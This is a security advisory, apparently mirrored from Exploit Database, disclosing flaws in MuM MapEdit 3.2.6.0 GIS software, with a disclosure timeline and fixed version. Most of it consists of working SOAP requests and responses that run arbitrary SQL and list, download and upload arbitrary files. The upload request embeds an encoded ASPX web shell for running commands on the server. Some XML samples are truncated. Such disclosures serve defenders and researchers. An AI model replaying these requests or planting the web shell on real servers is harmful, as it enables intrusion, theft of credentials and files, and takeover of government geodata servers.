MuM MapEdit 3.2.6.0 – Multiple Vulnerabilities

Exploit Database
118 阅读

作者： Paul Baade & Sven Krewitt

日期： 2016-09-19
类别：
- webapps
平台：
- aspx
来源：https://www.exploit-db.com/exploits/40397/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

# Security Advisory -- Multiple Vulnerabilities - MuM Map Edit

## Product

Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH

Product: MapEdit

Affected software version: 3.2.6.0

MuM MapEdit provides geodata to the internet and intranets and is deployed on several communal and

regional governmental infrastructures to provide geodata to the population. It consists of a

silverlight client and a C#.NET backend. The communication between them is HTTP/S based and involves

the NBFS (.NET Binary Format SOAP).

Link: http://www.mum.de/DE_Autodesk-Topobase-GIS-Datenerfassung-MuM-MapEdit.CAD

## Status/Metrics/Identifier

CVE-ID: tbd

CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)

CVSS Score: 9.0

The CVSS Score reflects the possibility of an attacker to upload web shells and execute them with

the privileges of the web server user.

## Author/Credits

Paul Baade (TÜV Rheinland i-sec GmbH)

Sven Krewitt (TÜV Rheinland i-sec GmbH)

## Fixed Versions

According to MuM all described vulnerabilities are fixed in version 6.2.74, some of them are reportedly

already fixed in version 5.1.

## Authentication via GET Parameter

The application requires users to provide their credentials via GET Parameters. They can therefore

possibly be found in server logs or proxy logs. An example URL would be:

/Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...]

## Execution of arbitrary SQL commands on contained SQLite DBs

The application contains several SQLite databases. An authenticated user may send POST requests to

the URL /Mum.Geo.Services/DataAccessService.svc. This service is used to execute SQL queries

on the databases.

The content of the POST request is encoded in Microsofts NBFS (.NET Binary Format SOAP) and can be

decoded to the following XML data:

Request:

--------

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">

<s:Header>

<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryData</a:Action>

<a:MessageID>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:MessageID>

<a:SequenceAcknowledgement>

<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>

</a:SequenceAcknowledgement>

<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/DataAccessService.svc</a:To>

</s:Header>

<s:Body>

<b:CurrentRepresentation>

<b:CollectionFeatureClassName/>

<b:Id>0</b:Id>

<b:LineFeatureClassName/>

<b:Name/>

<b:PointFeatureClassName/>

<b:PolygonFeatureClassName/>

</b:CurrentRepresentation>

<b:DbVersion>999</b:DbVersion>

<b:Id>0</b:Id>

<b:Name>SYSTEM</b:Name>

<b:StorageSchemaType>Unknown</b:StorageSchemaType>

<c:Filename>[path_to_MumGeoData]\System\System.db</c:Filename>

</connection>

<sql>select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_idin (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption</sql>

<b:Columns/>

<b:SRID>0</b:SRID>

</queryDefinition>

</QueryData>

</s:Body>

</s:Envelope>

The node "Filename" can be used to access different SQLite databases on the system, while the node

"sql" contains the SQL-query to be executed on the system.

Responses to this request are encoded in NBFS as well and can be decoded to the following XML data:

Response:

---------

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">

<s:Header>

<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryDataResponse</a:Action>

<a:RelatesTo>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:RelatesTo>

</s:Header>

<s:Body>

<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess">

<c:Data>eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj</c:Data>

<c:FetchedAllRows>true</c:FetchedAllRows>

<c:ResultColumns>

<c:DbColumnDefinition>

<c:Caption>NAME</c:Caption>

<c:DataType>DbString</c:DataType>

<c:DefaultValue/>

<c:IsNullable>false</c:IsNullable>

<c:IsPrimaryKey>false</c:IsPrimaryKey>

<c:Length>255</c:Length>

<c:Name>NAME</c:Name>

<c:Precision>0</c:Precision>

<c:Scale>0</c:Scale>

</c:DbColumnDefinition>

<c:DbColumnDefinition>

<c:Caption>CAPTION</c:Caption>

<c:DataType>DbString</c:DataType>

<c:DefaultValue/>

<c:IsNullable>false</c:IsNullable>

<c:IsPrimaryKey>false</c:IsPrimaryKey>

<c:Length>255</c:Length>

<c:Name>CAPTION</c:Name>

<c:Precision>0</c:Precision>

<c:Scale>0</c:Scale>

</c:DbColumnDefinition>

<c:DbColumnDefinition>

<c:Caption>VERSION_SYSTEMDATA</c:Caption>

<c:DataType>DbString</c:DataType>

<c:DefaultValue/>

<c:IsNullable>true</c:IsNullable>

<c:IsPrimaryKey>false</c:IsPrimaryKey>

<c:Length>40</c:Length>

<c:Name>VERSION_SYSTEMDATA</c:Name>

<c:Precision>0</c:Precision>

<c:Scale>0</c:Scale>

</c:DbColumnDefinition>

</c:ResultColumns>

</b:Parameter>

<b:State>

<b:Tags>

<b:Item i:nil="true"/>

</b:Tags>

<b:ExceptionMessage/>

<b:StackTrace/>

<b:Succeeded>true</b:Succeeded>

</b:State>

</QueryDataResult>

</QueryDataResponse>

</s:Body>

</s:Envelope>

The nodes "DbColumnDefinition" contain the definition of the returned columns, the node "Data"

contains the result of the SQL-query as an Base64-encoded zlib-compressed data:

GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc

The same result can be produced, when the database is locally read:

>sqlite3 System.db

sqlite> select name, caption, version_systemdata from project where id

in (select Project_idfrom usergroup_project where usergroup_id

in (select usergroup_id from user_usergroup where user_id

in (select id from user where name='TEST'))) order by caption;

GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc

## Arbitrary file manipulation

By sending POST requests to the URL /Mum.Geo.Services/IO.svc an authenticated user is able to

perform several actions.

Most interesting, from an attacker's point of view, would be the following:

- "GetFileName", which lists files in a given folder

- "DownloadFile", which enables the user to download any file the web server has read-access to

- "UploadFile", which allows to upload files to folders the web server has write-access to

The different activities are documented in the subsections below.

As well as in the SQL execution section, the request and response content is decoded from NBFS for

better readability.

### File exploration

An authenticated user is able to list all files in a given folder by sending the following content

to the IO Service.

Request:

--------

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">

<s:Header>

<a:Action s:mustUnderstand="1">urn:IO/GetFileNames</a:Action>

<a:MessageID>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:MessageID>

<a:SequenceAcknowledgement>

<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>

</a:SequenceAcknowledgement>

<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>

</s:Header>

<s:Body>

<path>[path_to_webroot]</path>

<recursive>false</recursive>

</GetFileNames>

</s:Body>

</s:Envelope>

Response:

---------

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">

<s:Header>

<a:Action s:mustUnderstand="1">urn:IO/GetFileNamesResponse</a:Action>

<a:RelatesTo>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:RelatesTo>

</s:Header>

<s:Body>

<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.IO">

<c:FileNames xmlns:d="http://schemas.microsoft.com/2003/10/Serialization/Arrays">

<d:string>clientaccesspolicy.xml</d:string>

<d:string>crossdomain.xml</d:string>

<d:string>iisstart.htm</d:string>

<d:string>index.html</d:string>

<d:string>index.php</d:string>

<d:string>Thumbs.db</d:string>

<d:string>web.config</d:string>

<d:string>welcome.png</d:string>

</c:FileNames>

<c:Path>[path_to_webroot]</c:Path>

</b:Parameter>

<b:State>

<b:Tags>

<b:Item i:nil="true"/>

</b:Tags>

<b:ExceptionMessage/>

<b:StackTrace/>

<b:Succeeded>true</b:Succeeded>

</b:State>

</GetFileNamesResult>

</GetFileNamesResponse>

</s:Body>

</s:Envelope>

### Download of arbitrary files

The same web service can be abused to download any file, that the web server user has read-access to.

Request:

--------

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">

<s:Header>

<a:Action s:mustUnderstand="1">urn:IO/DownloadFile</a:Action>

<a:MessageID>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:MessageID>

<a:SequenceAcknowledgement>

<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>

</a:SequenceAcknowledgement>

<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>

</s:Header>

<s:Body>

<filename>[path_to_webroot]\Mum.Geo.Services\Admin.html</filename>

</DownloadFile>

</s:Body>

</s:Envelope>

Response:

---------

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">

<s:Header>

<a:Action s:mustUnderstand="1">urn:IO/DownloadFileResponse</a:Action>

<a:RelatesTo>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:RelatesTo>

</s:Header>

<s:Body>

<b:Data>77u/PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQogICAgPHRpdGxlPkFkbWluPC90aXRsZT4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyBVUkw9U3RhcnQuYXNweD9BZG1pbk1vZGU9dHJ1ZSIvPg0KPC9oZWFkPg0KPGJvZHk+DQogIDxwPjxhIGhyZWY9IlN0YXJ0LmFzcHg/QWRtaW5Nb2RlPXRydWUiPlN0YXJ0IE11bSBBZG1pbmlzdHJhdG9yPC9hPjwvcD4gDQo8L2JvZHk+DQo8L2h0bWw+DQo=</b:Data>

<b:FileNotFound>false</b:FileNotFound>

<b:IsComplete>true</b:IsComplete>

</DownloadFileResult>

</DownloadFileResponse>

</s:Body>

</s:Envelope>

The node "Data" itself can be base64-decoded, to receive the file contents:

ï»¿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<head>

<title>Admin</title>

</head>

<body>

<p><a href="https://www.exploit-db.com/exploits/40397/Start.aspx?AdminMode=true">Start Mum Administrator</a></p>

</body>

</html>

### Upload of arbitrary files

The web service can be abused to upload a file to any folder, that the web server user has

write-access to.

Request:

--------

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">

<s:Header>

<a:Action s:mustUnderstand="1">urn:IO/UploadFile</a:Action>

<a:MessageID>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:MessageID>

<a:SequenceAcknowledgement>

<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>

</a:SequenceAcknowledgement>

<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>

</s:Header>

<s:Body>

<serverFilename>[path_to_webroot]\MumGeoData\Userdata\GDI\isec.aspx</serverFilename>

<temporaryServerFilename>[path_to_MumGeoData]\Userdata\GDI\e41279bd-343d-48a1-a413-05e1b3c50f40\Bookmarks\Bookmarks.sod.tmp636008925231332626</temporaryServerFilename>

<data>eJyFk21P2zAQx9/nU5w8IbXalj4A29Qk1aANolJHK5qJaW+QkxwhW2JHtgNBE99956TdWEHsleN7/Pl/F//gM6x5hrDkIqvpI2CzNwzmGNdZwIyqkUGkeEL2G15ouh1MHZ+SFmUllYELXqKuWv/mQRss3XnOMyG1yRP9/+DFqovRicor8wQiIQhVC24CplHdoWJT507maQt7vZQ87cn4ByYGNIoU1TsI71CYE5VpwL7zy3l0tFG5yCBsktrgrEx7WwNXmQ1YK5mg1hvDlVmIGwmVziEAgfew7+r1PYe87lleoH0DhbGkTF1skHUe6luX1F9b1yAB9pa6dK5LTHNFoFRNpFylq9pUtaE4K24X8lXj5haLImzQspKv1drbMUJFpu2321L1KI2gNkYhLy+RkwKgTalSRZGV+28vbyeFpeuiXJsTyVCk9m1b26yQGu1doamVAO2Riq3o9Fhiu54VefJzX/ftJPfkv6RBS6HRvVK5wR7zK4VTRrX3HJt2uO65KYtQJDLF3t95mcYWdCNsTL//PJX5g13RR8cfdCtEu3QefVnaIzyZ02FyU+CU36MAritXoIF7jLWV2x90TkreBscyfQA6b6QqIU8DO2UGJZpbSZeKtvr5VvpUdmIZT2XT5nTYjJR+KGiTv79fXMzDbxMYDUceLMOzaAJHw+Oq8WC92iyixepiAjzWsqBnexCt1hMYD6tmvxNc5am5Ddj42Dqn/uBJ3y3FaW2MFB0E0h8oXqQY7yg+fHydYvTpBQrbMWDYDonBSrQ70Qr1Z0N2cB3Olm3JYyxatCIubJGX0A53aIej4esCjZ+jTWeyLGnvJ133tqGdrR2mPe1w21m3+/EbI5Kikw==</data>

<append>false</append>

</UploadFile>

</s:Body>

</s:Envelope>

The "data" node contains a base64-encoded, zlib-packed aspx web shell. It can be used to issue

arbitrary commands on the compromised host.

Response:

---------

<?xml version="1.0" encoding="utf-8"?>

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">

<s:Header>

<a:Action s:mustUnderstand="1">urn:IO/UploadFileResponse</a:Action>

<a:RelatesTo>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:RelatesTo>

</s:Header>

<s:Body>

<b:Parameter/>

<b:State>

<b:Tags>

<b:Item i:nil="true"/>

</b:Tags>

<b:ExceptionMessage/>

<b:StackTrace/>

<b:Succeeded>true</b:Succeeded>

</b:State>

</UploadFileResult>

</UploadFileResponse>

</s:Body>

</s:Envelope>

## Base64 encoded Passwords

In the database file in \MumGeoData\System\System.db Passwords are stored in the tables "user" and

"connection". Both tables store their passwords in plain text with base64 encoding applied.

Example:

sqlite> select * from user where name='MUM';

<User GUID>|MUM|<base64 encoded password>|1||

## Remark about information disclosures

Observing the communication between a MapEdit Silverlight client and its backend server, various

information could be gathered, particularly file paths and license keys. Additionally the error

messages, that the server generates discloses quite a lot of information about the backend parsing

process.

## History

2016-06-07Discovery of mentioned vulnerabilities

2016-06-09First contact with MuM

2016-06-23confirmation of mentioned vulnerabilities

2016-07-29Release of version 6.2.74

2016-09-13Public disclosure